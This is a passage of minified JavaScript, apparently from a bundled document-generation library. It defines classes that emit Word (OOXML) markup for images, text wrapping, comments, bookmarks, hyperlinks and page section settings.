R2(Ce,nt),this.root.push(this.data)}}(function(Se){Se[Se.NONE=0]="NONE",Se[Se.SQUARE=1]="SQUARE",Se[Se.TIGHT=2]="TIGHT",Se[Se.TOP_AND_BOTTOM=3]="TOP_AND_BOTTOM"})(Gt||(Gt={})),function(Se){Se.BOTH_SIDES="bothSides",Se.LEFT="left",Se.RIGHT="right",Se.LARGEST="largest"}(Co||(Co={}));class ss extends E{constructor(){super("wp:wrapNone")}}class Zg extends b{constructor(){super(...arguments),this.xmlKeys={distT:"distT",distB:"distB",distL:"distL",distR:"distR",wrapText:"wrapText"}}}class ad extends E{constructor(Ce,nt={top:0,bottom:0,left:0,right:0}){super("wp:wrapSquare"),this.root.push(new Zg({wrapText:Ce.side||Co.BOTH_SIDES,distT:nt.top,distB:nt.bottom,distL:nt.left,distR:nt.right}))}}class xM extends b{constructor(){super(...arguments),this.xmlKeys={distT:"distT",distB:"distB"}}}class dl extends E{constructor(Ce={top:0,bottom:0}){super("wp:wrapTight"),this.root.push(new xM({distT:Ce.top,distB:Ce.bottom}))}}class wM extends b{constructor(){super(...arguments),this.xmlKeys={distT:"distT",distB:"distB"}}}class Bu extends E{constructor(Ce={top:0,bottom:0}){super("wp:wrapTopAndBottom"),this.root.push(new wM({distT:Ce.top,distB:Ce.bottom}))}}class IM extends b{constructor(){super(...arguments),this.xmlKeys={id:"id",name:"name",descr:"descr"}}}class k2 extends E{constructor(){super("wp:docPr"),this.root.push(new IM({id:0,name:"",descr:""}))}}class P2 extends b{constructor(){super(...arguments),this.xmlKeys={b:"b",l:"l",r:"r",t:"t"}}}class O2 extends E{constructor(){super("wp:effectExtent"),this.root.push(new P2({b:0,l:0,r:0,t:0}))}}class N2 extends b{constructor(){super(...arguments),this.xmlKeys={cx:"cx",cy:"cy"}}}class L2 extends E{constructor(Ce,nt){super("wp:extent"),this.attributes=new N2({cx:Ce,cy:nt}),this.root.push(this.attributes)}}class mr extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns:a",noChangeAspect:"noChangeAspect"}}}class mo extends E{constructor(){super("a:graphicFrameLocks"),this.root.push(new mr({xmlns:"http://schemas.openxmlformats.org/drawingml/2006/main",noChangeAspect:1}))}}class e0 extends E{constructor(){super("wp:cNvGraphicFramePr"),this.root.push(new mo)}}class z2 extends b{constructor(){super(...arguments),this.xmlKeys={distT:"distT",distB:"distB",distL:"distL",distR:"distR",allowOverlap:"allowOverlap",behindDoc:"behindDoc",layoutInCell:"layoutInCell",locked:"locked",relativeHeight:"relativeHeight",simplePos:"simplePos"}}}class RM extends E{constructor(Ce,nt,Dt){super("wp:anchor");const di=Object.assign({allowOverlap:!0,behindDocument:!1,lockAnchor:!1,layoutInCell:!0,verticalPosition:{},horizontalPosition:{}},Dt.floating);if(this.root.push(new z2({distT:di.margins&&di.margins.top||0,distB:di.margins&&di.margins.bottom||0,distL:di.margins&&di.margins.left||0,distR:di.margins&&di.margins.right||0,simplePos:"0",allowOverlap:!0===di.allowOverlap?"1":"0",behindDoc:!0===di.behindDocument?"1":"0",locked:!0===di.lockAnchor?"1":"0",layoutInCell:!0===di.layoutInCell?"1":"0",relativeHeight:di.zIndex?di.zIndex:nt.emus.y})),this.root.push(new Va),this.root.push(new Vn(di.horizontalPosition)),this.root.push(new Pn(di.verticalPosition)),this.root.push(new L2(nt.emus.x,nt.emus.y)),this.root.push(new O2),void 0!==Dt.floating&&void 0!==Dt.floating.wrap)switch(Dt.floating.wrap.type){case Gt.SQUARE:this.root.push(new ad(Dt.floating.wrap,Dt.floating.margins));break;case Gt.TIGHT:this.root.push(new dl(Dt.floating.margins));break;case Gt.TOP_AND_BOTTOM:this.root.push(new Bu(Dt.floating.margins));break;default:this.root.push(new ss)}else this.root.push(new ss);this.root.push(new k2),this.root.push(new e0),this.root.push(new Vu(Ce,nt))}}class hi extends b{constructor(){super(...arguments),this.xmlKeys={distT:"distT",distB:"distB",distL:"distL",distR:"distR"}}}class SM extends E{constructor(Ce,nt){super("wp:inline"),this.root.push(new hi({distT:0,distB:0,distL:0,distR:0})),this.extent=new L2(nt.emus.x,nt.emus.y),this.graphic=new Vu(Ce,nt),this.root.push(this.extent),this.root.push(new O2),this.root.push(new k2),this.root.push(new e0),this.root.push(this.graphic)}}class Ci extends E{constructor(Ce,nt={}){super("w:drawing"),nt.floating?this.root.push(new RM(Ce,Ce.transformation,nt)):(this.inline=new SM(Ce,Ce.transformation),this.root.push(this.inline))}}class Hu extends pt{constructor(Ce){super({}),this.key=`${(0,ua.EL)()}.png`;const nt="string"==typeof Ce.data?this.convertDataURIToBinary(Ce.data):Ce.data;this.imageData={stream:nt,fileName:this.key,transformation:{pixels:{x:Math.round(Ce.transformation.width),y:Math.round(Ce.transformation.height)},emus:{x:Math.round(9525*Ce.transformation.width),y:Math.round(9525*Ce.transformation.height)},flip:Ce.transformation.flip,rotation:Ce.transformation.rotation?6e4*Ce.transformation.rotation:void 0}};const Dt=new Ci(this.imageData,{floating:Ce.floating});this.root.push(Dt)}prepForXml(Ce){return Ce.file.Media.addImage(this.key,this.imageData),super.prepForXml(Ce)}convertDataURIToBinary(Ce){const nt=";base64,",Dt=Ce.indexOf(nt)+nt.length;return"function"==typeof atob?new Uint8Array(atob(Ce.substring(Dt)).split("").map(di=>di.charCodeAt(0))):new(ae(8764).Buffer)(Ce,"base64")}}class t0 extends E{constructor(Ce){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push(`SEQ ${Ce}`)}}class a0 extends pt{constructor(Ce){super({}),this.root.push(new Ue(!0)),this.root.push(new t0(Ce)),this.root.push(new Xe),this.root.push(new He)}}class W2 extends E{constructor(){super("w:tab")}}class cs extends b{constructor(){super(...arguments),this.xmlKeys={instr:"w:instr"}}}class Yp extends E{constructor(Ce,nt){super("w:fldSimple"),this.root.push(new cs({instr:Ce})),void 0!==nt&&this.root.push(new vt(nt))}}class Ll extends Yp{constructor(Ce){super(` MERGEFIELD ${Ce} `,`\xab${Ce}\xbb`)}}class Jp extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id",initials:"w:initials",author:"w:author",date:"w:date"}}}class vf extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id"}}}class F2 extends b{constructor(){super(...arguments),this.xmlKeys={"xmlns:cx":"xmlns:cx","xmlns:cx1":"xmlns:cx1","xmlns:cx2":"xmlns:cx2","xmlns:cx3":"xmlns:cx3","xmlns:cx4":"xmlns:cx4","xmlns:cx5":"xmlns:cx5","xmlns:cx6":"xmlns:cx6","xmlns:cx7":"xmlns:cx7","xmlns:cx8":"xmlns:cx8","xmlns:mc":"xmlns:mc","xmlns:aink":"xmlns:aink","xmlns:am3d":"xmlns:am3d","xmlns:o":"xmlns:o","xmlns:r":"xmlns:r","xmlns:m":"xmlns:m","xmlns:v":"xmlns:v","xmlns:wp14":"xmlns:wp14","xmlns:wp":"xmlns:wp","xmlns:w10":"xmlns:w10","xmlns:w":"xmlns:w","xmlns:w14":"xmlns:w14","xmlns:w15":"xmlns:w15","xmlns:w16cex":"xmlns:w16cex","xmlns:w16cid":"xmlns:w16cid","xmlns:w16":"xmlns:w16","xmlns:w16sdtdh":"xmlns:w16sdtdh","xmlns:w16se":"xmlns:w16se","xmlns:wpg":"xmlns:wpg","xmlns:wpi":"xmlns:wpi","xmlns:wne":"xmlns:wne","xmlns:wps":"xmlns:wps"}}}class Da extends E{constructor(Ce){super("w:commentRangeStart"),this.root.push(new vf({id:Ce}))}}class Vm extends E{constructor(Ce){super("w:commentRangeEnd"),this.root.push(new vf({id:Ce}))}}class Af extends E{constructor(Ce){super("w:commentReference"),this.root.push(new vf({id:Ce}))}}class Bs extends E{constructor({id:Ce,initials:nt,author:Dt,date:di=new Date,text:pi}){super("w:comment"),this.root.push(new Jp({id:Ce,initials:nt,author:Dt,date:di.toISOString()})),this.root.push(new uc({children:[new vt(pi)]}))}}class Zp extends E{constructor({children:Ce}){super("w:comments"),this.root.push(new F2({"xmlns:cx":"http://schemas.microsoft.com/office/drawing/2014/chartex","xmlns:cx1":"http://schemas.microsoft.com/office/drawing/2015/9/8/chartex","xmlns:cx2":"http://schemas.microsoft.com/office/drawing/2015/10/21/chartex","xmlns:cx3":"http://schemas.microsoft.com/office/drawing/2016/5/9/chartex","xmlns:cx4":"http://schemas.microsoft.com/office/drawing/2016/5/10/chartex","xmlns:cx5":"http://schemas.microsoft.com/office/drawing/2016/5/11/chartex","xmlns:cx6":"http://schemas.microsoft.com/office/drawing/2016/5/12/chartex","xmlns:cx7":"http://schemas.microsoft.com/office/drawing/2016/5/13/chartex","xmlns:cx8":"http://schemas.microsoft.com/office/drawing/2016/5/14/chartex","xmlns:mc":"http://schemas.openxmlformats.org/markup-compatibility/2006","xmlns:aink":"http://schemas.microsoft.com/office/drawing/2016/ink","xmlns:am3d":"http://schemas.microsoft.com/office/drawing/2017/model3d","xmlns:o":"urn:schemas-microsoft-com:office:office","xmlns:r":"http://schemas.openxmlformats.org/officeDocument/2006/relationships","xmlns:m":"http://schemas.openxmlformats.org/officeDocument/2006/math","xmlns:v":"urn:schemas-microsoft-com:vml","xmlns:wp14":"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing","xmlns:wp":"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing","xmlns:w10":"urn:schemas-microsoft-com:office:word","xmlns:w":"http://schemas.openxmlformats.org/wordprocessingml/2006/main","xmlns:w14":"http://schemas.microsoft.com/office/word/2010/wordml","xmlns:w15":"http://schemas.microsoft.com/office/word/2012/wordml","xmlns:w16cex":"http://schemas.microsoft.com/office/word/2018/wordml/cex","xmlns:w16cid":"http://schemas.microsoft.com/office/word/2016/wordml/cid","xmlns:w16":"http://schemas.microsoft.com/office/word/2018/wordml","xmlns:w16sdtdh":"http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash","xmlns:w16se":"http://schemas.microsoft.com/office/word/2015/wordml/symex","xmlns:wpg":"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup","xmlns:wpi":"http://schemas.microsoft.com/office/word/2010/wordprocessingInk","xmlns:wne":"http://schemas.microsoft.com/office/word/2006/wordml","xmlns:wps":"http://schemas.microsoft.com/office/word/2010/wordprocessingShape"}));for(const nt of Ce)this.root.push(new Bs(nt))}}!function(Se){Se.COLUMN="column",Se.PAGE="page"}(jt||(jt={}));class nd extends E{constructor(Ce){super("w:br"),this.root.push(new _({type:Ce}))}}class kc extends pt{constructor(){super({}),this.root.push(new nd(jt.PAGE))}}class ec extends pt{constructor(){super({}),this.root.push(new nd(jt.COLUMN))}}class V2 extends E{constructor(){super("w:pageBreakBefore")}}!function(Se){Se.AT_LEAST="atLeast",Se.EXACTLY="exactly",Se.AUTO="auto"}(qt||(qt={}));class kM extends b{constructor(){super(...arguments),this.xmlKeys={after:"w:after",before:"w:before",line:"w:line",lineRule:"w:lineRule"}}}class dc extends E{constructor(Ce){super("w:spacing"),this.root.push(new kM(Ce))}}!function(Se){Se.HEADING_1="Heading1",Se.HEADING_2="Heading2",Se.HEADING_3="Heading3",Se.HEADING_4="Heading4",Se.HEADING_5="Heading5",Se.HEADING_6="Heading6",Se.TITLE="Title"}(Qn||(Qn={}));class vo extends E{constructor(Ce){super("w:pStyle"),this.root.push(new _({val:Ce}))}}class e_ extends E{constructor(Ce,nt,Dt){super("w:tabs"),this.root.push(new Ud(Ce,nt,Dt))}}(function(Se){Se.LEFT="left",Se.RIGHT="right",Se.CENTER="center",Se.BAR="bar",Se.CLEAR="clear",Se.DECIMAL="decimal",Se.END="end",Se.NUM="num",Se.START="start"})(Kt||(Kt={})),function(Se){Se.DOT="dot",Se.HYPHEN="hyphen",Se.MIDDLE_DOT="middleDot",Se.NONE="none",Se.UNDERSCORE="underscore"}(Zt||(Zt={})),function(Se){Se[Se.MAX=9026]="MAX"}(Bo||(Bo={}));class B2 extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val",pos:"w:pos",leader:"w:leader"}}}class Ud extends E{constructor(Ce,nt,Dt){super("w:tab"),this.root.push(new B2({val:Ce,pos:nt,leader:Dt}))}}class Xn extends E{constructor(Ce,nt){super("w:numPr"),this.root.push(new Tf(nt)),this.root.push(new t_(Ce))}}class Tf extends E{constructor(Ce){if(super("w:ilvl"),Ce>9)throw new Error("Level cannot be greater than 9. Read more here: https://answers.microsoft.com/en-us/msoffice/forum/all/does-word-support-more-than-9-list-levels/d130fdcd-1781-446d-8c84-c6c79124e4d7");this.root.push(new _({val:Ce}))}}class t_ extends E{constructor(Ce){super("w:numId"),this.root.push(new _({val:"string"==typeof Ce?`{${Ce}}`:Ce}))}}class i_ extends b{constructor(){super(...arguments),this.xmlKeys={id:"Id",type:"Type",target:"Target",targetMode:"TargetMode"}}}!function(Se){Se.EXTERNAL="External"}(ti||(ti={}));class n0 extends E{constructor(Ce,nt,Dt,di){super("Relationship"),this.root.push(new i_({id:Ce,type:nt,target:Dt,targetMode:di}))}}class mc extends b{constructor(){super(...arguments),this.xmlKeys={id:"r:id",history:"w:history",anchor:"w:anchor"}}}!function(Se){Se.INTERNAL="INTERNAL",Se.EXTERNAL="EXTERNAL"}(ii||(ii={}));class qd extends E{constructor(Ce,nt,Dt){super("w:hyperlink"),this.linkId=nt;const pi=new mc({history:1,anchor:Dt||void 0,id:Dt?void 0:`rId${this.linkId}`});this.root.push(pi),Ce.forEach(Hi=>{this.root.push(Hi)})}}class H2 extends qd{constructor(Ce){super(Ce.children,(0,ua.EL)(),Ce.anchor)}}class Wt extends E{constructor(Ce){super("w:externalHyperlink"),this.options=Ce}}class Ds extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id",name:"w:name"}}}class o0 extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id"}}}class a_{constructor(Ce){const nt=(0,ua.NY)();this.start=new yi(Ce.id,nt),this.children=Ce.children,this.end=new r0(nt)}}class yi extends E{constructor(Ce,nt){super("w:bookmarkStart");const Dt=new Ds({name:Ce,id:nt});this.root.push(Dt)}}class r0 extends E{constructor(Ce){super("w:bookmarkEnd");const nt=new o0({id:Ce});this.root.push(nt)}}class Uu extends E{constructor(Ce){super("w:outlineLvl"),this.level=Ce,this.root.push(new _({val:Ce}))}}class Ot extends E{constructor(Ce,nt={}){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE}));let Dt=`PAGEREF ${Ce}`;nt.hyperlink&&(Dt=`${Dt} \\h`),nt.useRelativePosition&&(Dt=`${Dt} \\p`),this.root.push(Dt)}}class Fr extends pt{constructor(Ce,nt={}){super({children:[new Ue(!0),new Ot(Ce,nt),new He]})}}!function(Se){Se.BOTTOM="bottom",Se.CENTER="center",Se.TOP="top"}(pn||(pn={}));class Un extends b{constructor(){super(...arguments),this.xmlKeys={verticalAlign:"w:val"}}}class ur extends E{constructor(Ce){super("w:vAlign"),this.root.push(new Un({verticalAlign:Ce}))}}!function(Se){Se.DEFAULT="default",Se.FIRST="first",Se.EVEN="even"}(Pt||(Pt={}));class tn extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",id:"r:id"}}}!function(Se){Se.HEADER="w:headerReference",Se.FOOTER="w:footerReference"}(Xt||(Xt={}));class zl extends E{constructor(Ce,nt){super(Ce),this.root.push(new tn({type:nt.type||Pt.DEFAULT,id:`rId${nt.id}`}))}}class ls extends b{constructor(){super(...arguments),this.xmlKeys={space:"w:space",count:"w:num",separate:"w:sep",equalWidth:"w:equalWidth"}}}class Bm extends E{constructor({space:Ce,count:nt,separate:Dt,equalWidth:di,children:pi}){super("w:cols"),this.root.push(new ls({space:void 0===Ce?void 0:(0,z.Jd)(Ce),count:void 0===nt?void 0:(0,z.vH)(nt),separate:Dt,equalWidth:di})),!di&&pi&&pi.forEach(Hi=>this.addChildElement(Hi))}}!function(Se){Se.DEFAULT="default",Se.LINES="lines",Se.LINES_AND_CHARS="linesAndChars",Se.SNAP_TO_CHARS="snapToChars"}(Ho||(Ho={}));class Wl extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",linePitch:"w:linePitch",charSpace:"w:charSpace"}}}class xs extends E{constructor(Ce,nt,Dt){super("w:docGrid"),this.root.push(new Wl({type:Dt,linePitch:(0,z.vH)(Ce),charSpace:nt?(0,z.vH)(nt):void 0}))}}!function(Se){Se.NEW_PAGE="newPage",Se.NEW_SECTION="newSection",Se.CONTINUOUS="continuous"}(Qt||(Qt={}));class qu extends b{constructor(){super(...arguments),this.xmlKeys={countBy:"w:countBy",start:"w:start",restart:"w:restart",distance:"w:distance"}}}class ws extends E{constructor({countBy:Ce,start:nt,restart:Dt,distance:di}){super("w:lnNumType"),this.root.push(new qu({countBy:void 0===Ce?void 0:(0,z.vH)(Ce),start:void 0===nt?void 0:(0,z.vH)(nt),restart:Dt,distance:void 0===di?void 0:(0,z.Jd)(di)}))}}(function(Se){Se.ALL_PAGES="allPages",Se.FIRST_PAGE="firstPage",Se.NOT_FIRST_PAGE="notFirstPage"})(ei||(ei={})),function(Se){Se.PAGE="page",Se.TEXT="text"}($o||($o={})),function(Se){Se.BACK="back",Se.FRONT="front"}(ai||(ai={}));class In extends b{constructor(){super(...arguments),this.xmlKeys={display:"w:display",offsetFrom:"w:offsetFrom",zOrder:"w:zOrder"}}}class n_ extends g{constructor(Ce){super("w:pgBorders"),Ce&&(this.root.push(new In(Ce.pageBorders?{display:Ce.pageBorders.display,offsetFrom:Ce.pageBorders.offsetFrom,zOrder:Ce.pageBorders.zOrder}:{})),Ce.pageBorderTop&&this.root.push(new L("w:top",Ce.pageBorderTop)),Ce.pageBorderLeft&&this.root.push(new L("w:left",Ce.pageBorderLeft)),Ce.pageBorderBottom&&this.root.push(new L("w:bottom",Ce.pageBorderBottom)),Ce.pageBorderRight&&this.root.push(new L("w:right",Ce.pageBorderRight)))}}class xo extends b{constructor(){super(...arguments),this.xmlKeys={top:"w:top",right:"w:right",bottom:"w:bottom",left:"w:left",header:"w:header",footer:"w:footer",gutter:"w:gutter"}}}class Vi extends E{constructor(Ce,nt,Dt,di,pi,Hi,pa){super("w:pgMar"),this.root.push(new xo({top:(0,z.xb)(Ce),right:(0,z.Jd)(nt),bottom:(0,z.xb)(Dt),left:(0,z.Jd)(di),header:(0,z.Jd)(pi),footer:(0,z.Jd)(Hi),gutter:(0,z.Jd)(pa)}))}}!function(Se){Se.HYPHEN="hyphen",Se.PERIOD="period",Se.COLON="colon",Se.EM_DASH="emDash",Se.EN_DASH="endash"}($t||($t={}));class Ia extends b{constructor(){super(...arguments),this.xmlKeys={start:"w:start",formatType:"w:fmt",separator:"w:chapSep"}}}class wo extends E{constructor({start:Ce,formatType:nt,separator:Dt}){super("w:pgNumType"),this.root.push(new Ia({start:void 0===Ce?void 0:(0,z.vH)(Ce),formatType:nt,separator:Dt}))}}!function(Se){Se.PORTRAIT="portrait",Se.LANDSCAPE="landscape"}(zo||(zo={}));class _n extends b{constructor(){super(...arguments),this.xmlKeys={width:"w:w",height:"w:h",orientation:"w:orient"}}}class Fl extends E{constructor(Ce,nt,Dt){super("w:pgSz");const di=Dt===zo.LANDSCAPE,pi=(0,z.Jd)(Ce),Hi=(0,z.Jd)(nt);this.root.push(new _n({width:di?Hi:pi,height:di?pi:Hi,orientation:Dt}))}}!function(Se){Se.LEFT_TO_RIGHT_TOP_TO_BOTTOM="lrTb",Se.TOP_TO_BOTTOM_RIGHT_TO_LEFT="tbRl"}(Ut||(Ut={}));class Rr extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class Vl extends E{constructor(Ce){super("w:textDirection"),this.root.push(new Rr({val:Ce}))}}!function(Se){Se.NEXT_PAGE="nextPage",Se.NEXT_COLUMN="nextColumn",Se.CONTINUOUS="continuous",Se.EVEN_PAGE="evenPage",Se.ODD_PAGE="oddPage"}(Yt||(Yt={}));class Zo extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class Bl extends E{constructor(Ce){super("w:type"),this.root.push(new Zo({val:Ce}))}}const tc={TOP:"1in",RIGHT:"1in",BOTTOM:"1in",LEFT:"1in",HEADER:708,FOOTER:708,GUTTER:0},$a={WIDTH:11906,HEIGHT:16838,ORIENTATION:zo.PORTRAIT};class ds extends E{constructor({page:{size:{width:Ce=$a.WIDTH,height:nt=$a.HEIGHT,orientation:Dt=$a.ORIENTATION}={},margin:{top:di=tc.TOP,right:pi=tc.RIGHT,bottom:Hi=tc.BOTTOM,left:pa=tc.LEFT,header:Ya=tc.HEADER,footer:ca=tc.FOOTER,gutter:ka=tc.GUTTER}={},pageNumbers:Dr={},borders:Ao,textDirection:rr}={},grid:{linePitch:Wc=360,charSpace:At,type:gc}={},headerWrapperGroup:Po={},footerWrapperGroup:Bf={},lineNumbers:eu,titlePage:dh,verticalAlign:mh,column:W_,type:uh}={}){super("w:sectPr"),this.addHeaderFooterGroup(Xt.HEADER,Po),this.addHeaderFooterGroup(Xt.FOOTER,Bf),uh&&this.root.push(new Bl(uh)),this.root.push(new Fl(Ce,nt,Dt)),this.root.push(new Vi(di,pi,Hi,pa,Ya,ca,ka)),Ao&&this.root.push(new n_(Ao)),eu&&this.root.push(new ws(eu)),this.root.push(new wo(Dr)),W_&&this.root.push(new Bm(W_)),mh&&this.root.push(new ur(mh)),void 0!==dh&&this.root.push(new l("w:titlePg",dh)),rr&&this.root.push(new Vl(rr)),this.root.push(new xs(Wc,At,gc))}addHeaderFooterGroup(Ce,nt){nt.default&&this.root.push(new zl(Ce,{type:Pt.DEFAULT,id:nt.default.View.ReferenceId})),nt.first&&this.root.push(new zl(Ce,{type:Pt.FIRST,id:nt.first.View.ReferenceId})),nt.even&&this.root.push(new zl(Ce,{type:Pt.EVEN,id:nt.even.View.ReferenceId}))}}class Hs extends E{constructor(){super("w:body"),this.sections=[]}addSection(Ce){const nt=this.sections.pop();this.root.push(this.createSectionParagraph(nt)),this.sections.push(new ds(Ce))}prepForXml(Ce){return 1===this.sections.length&&(this.root.splice(0,1),this.root.push(this.sections.pop())),super.prepForXml(Ce)}push(Ce){this.root.push(Ce)}createSectionParagraph(Ce){const nt=new uc({}),Dt=new ml({});return Dt.push(Ce),nt.addChildElement(Dt),nt}}class Pc extends b{constructor(){super(...arguments),this.xmlKeys={width:"w:w",space:"w:space"}}}class er extends E{constructor({width:Ce,space:nt}){super("w:col"),this.root.push(new Pc({width:(0,z.Jd)(Ce),space:void 0===nt?void 0:(0,z.Jd)(nt)}))}}class ko extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",Ignorable:"mc:Ignorable",cp:"xmlns:cp",dc:"xmlns:dc",dcterms:"xmlns:dcterms",dcmitype:"xmlns:dcmitype",xsi:"xmlns:xsi",type:"xsi:type",cx:"xmlns:cx",cx1:"xmlns:cx1",cx2:"xmlns:cx2",cx3:"xmlns:cx3",cx4:"xmlns:cx4",cx5:"xmlns:cx5",cx6:"xmlns:cx6",cx7:"xmlns:cx7",cx8:"xmlns:cx8",aink:"xmlns:aink",am3d:"xmlns:am3d",w16cex:"xmlns:w16cex",w16cid:"xmlns:w16cid",w16:"xmlns:w16",w16sdtdh:"xmlns:w16sdtdh",w16se:"xmlns:w16se"}}}class Gd extends b{constructor(){super(...arguments),this.xmlKeys={color:"w:color",themeColor:"w:themeColor",themeShade:"w:themeShade",themeTint:"w:themeTint"}}}class od extends E{constructor(Ce){super("w:background"),this.root.push(new Gd({color:void 0===Ce.color?void 0:(0,z.dg)(Ce.color),themeColor:Ce.themeColor,themeShade:void 0===Ce.themeShade?void 0:(0,z.xD)(Ce.themeShade),themeTint:void 0===Ce.themeTint?void 0:(0,z.xD)(Ce.themeTint)}))}}class ic extends E{constructor(Ce){super("w:document"),this.root.push(new ko({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",cx:"http://schemas.microsoft.com/office/drawing/2014/chartex",cx1:"http://schemas.microsoft.com/office/drawing/2015/9/8/chartex",cx2:"http://schemas.microsoft.com/office/drawing/2015/10/21/chartex",cx3:"http://schemas.microsoft.com/office/drawing/2016/5/9/chartex",cx4:"http://schemas.microsoft.com/office/drawing/2016/5/10/chartex",cx5:"http://schemas.microsoft.com/office/drawing/2016/5/11/chartex",cx6:"http://schemas.microsoft.com/office/drawing/2016/5/12/chartex",cx7:"http://schemas.microsoft.com/office/drawing/2016/5/13/chartex",cx8:"http://schemas.microsoft.com/office/drawing/2016/5/14/chartex",aink:"http://schemas.microsoft.com/office/drawing/2016/ink",am3d:"http://schemas.microsoft.com/office/drawing/2017/model3d",w16cex:"http://schemas.microsoft.com/office/word/2018/wordml/cex",w16cid:"http://schemas.microsoft.com/office/word/2016/wordml/cid",w16:"http://schemas.microsoft.com/office/word/2018/wordml",w16sdtdh:"http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash",w16se:"http://schemas.microsoft.com/office/word/2015/wordml/symex",Ignorable:"w14 w15 wp14"})),this.body=new Hs,this.root.push(new od(Ce.background)),this.root.push(this.body)}add(Ce){return this.body.push(Ce),this}get Body(){return this.body}}class jd extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns"}}}class Hm extends E{constructor(){super("Relationships"),this.root.push(new jd({xmlns:"http://schemas.openxmlformats.org/package/2006/relationships"}))}addRelationship(Ce){this.root.push(Ce)}createRelationship(Ce,nt,Dt,di){const pi=new n0(`rId${Ce}`,nt,Dt,di);return this.addRelationship(pi),pi}get RelationshipCount(){return this.root.length-1}}class uo{constructor(Ce){this.document=new ic(Ce),this.relationships=new Hm}get View(){return this.document}get Relationships(){return this.relationships}}var Oc,o_,ms;(function(Se){Se.NONE="none",Se.DROP="drop",Se.MARGIN="margin"})(Oc||(Oc={})),function(Se){Se.MARGIN="margin",Se.PAGE="page",Se.TEXT="text"}(o_||(o_={})),function(Se){Se.AROUND="around",Se.AUTO="auto",Se.NONE="none",Se.NOT_BESIDE="notBeside",Se.THROUGH="through",Se.TIGHT="tight"}(ms||(ms={}));class Is extends b{constructor(){super(...arguments),this.xmlKeys={anchorLock:"w:anchorLock",dropCap:"w:dropCap",width:"w:w",height:"w:h",x:"w:x",y:"w:y",anchorHorizontal:"w:hAnchor",anchorVertical:"w:vAnchor",spaceHorizontal:"w:hSpace",spaceVertical:"w:vSpace",rule:"w:hRule",alignmentX:"w:xAlign",alignmentY:"w:yAlign",lines:"w:lines",wrap:"w:wrap"}}}class Gu extends E{constructor(Ce){var nt,Dt;super("w:framePr"),this.root.push(new Is({anchorLock:Ce.anchorLock,dropCap:Ce.dropCap,width:Ce.width,height:Ce.height,x:Ce.position?Ce.position.x:void 0,y:Ce.position?Ce.position.y:void 0,anchorHorizontal:Ce.anchor.horizontal,anchorVertical:Ce.anchor.vertical,spaceHorizontal:null===(nt=Ce.space)||void 0===nt?void 0:nt.horizontal,spaceVertical:null===(Dt=Ce.space)||void 0===Dt?void 0:Dt.vertical,rule:Ce.rule,alignmentX:Ce.alignment?Ce.alignment.x:void 0,alignmentY:Ce.alignment?Ce.alignment.y:void 0,lines:Ce.lines,wrap:Ce.wrap}))}}class ml extends g{constructor(Ce){var nt,Dt;if(super("w:pPr"),this.numberingReferences=[],!Ce)return this;if(Ce.heading&&this.push(new vo(Ce.heading)),Ce.bullet&&this.push(new vo("ListParagraph")),Ce.numbering&&(Ce.style||Ce.heading||Ce.numbering.custom||this.push(new vo("ListParagraph"))),Ce.style&&this.push(new vo(Ce.style)),void 0!==Ce.keepNext&&this.push(new l("w:keepNext",Ce.keepNext)),void 0!==Ce.keepLines&&this.push(new l("w:keepLines",Ce.keepLines)),Ce.pageBreakBefore&&this.push(new V2),Ce.frame&&this.push(new Gu(Ce.frame)),void 0!==Ce.widowControl&&this.push(new l("w:widowControl",Ce.widowControl)),Ce.bullet&&this.push(new Xn(1,Ce.bullet.level)),Ce.numbering&&(this.numberingReferences.push({reference:Ce.numbering.reference,instance:null!==(nt=Ce.numbering.instance)&&void 0!==nt?nt:0}),this.push(new Xn(`${Ce.numbering.reference}-${null!==(Dt=Ce.numbering.instance)&&void 0!==Dt?Dt:0}`,Ce.numbering.level))),Ce.border&&this.push(new R(Ce.border)),Ce.thematicBreak&&this.push(new J),Ce.shading&&this.push(new me(Ce.shading)),Ce.rightTabStop&&this.push(new e_(Kt.RIGHT,Ce.rightTabStop)),Ce.tabStops)for(const di of Ce.tabStops)this.push(new e_(di.type,di.position,di.leader));Ce.leftTabStop&&this.push(new e_(Kt.LEFT,Ce.leftTabStop)),void 0!==Ce.bidirectional&&this.push(new l("w:bidi",Ce.bidirectional)),Ce.spacing&&this.push(new 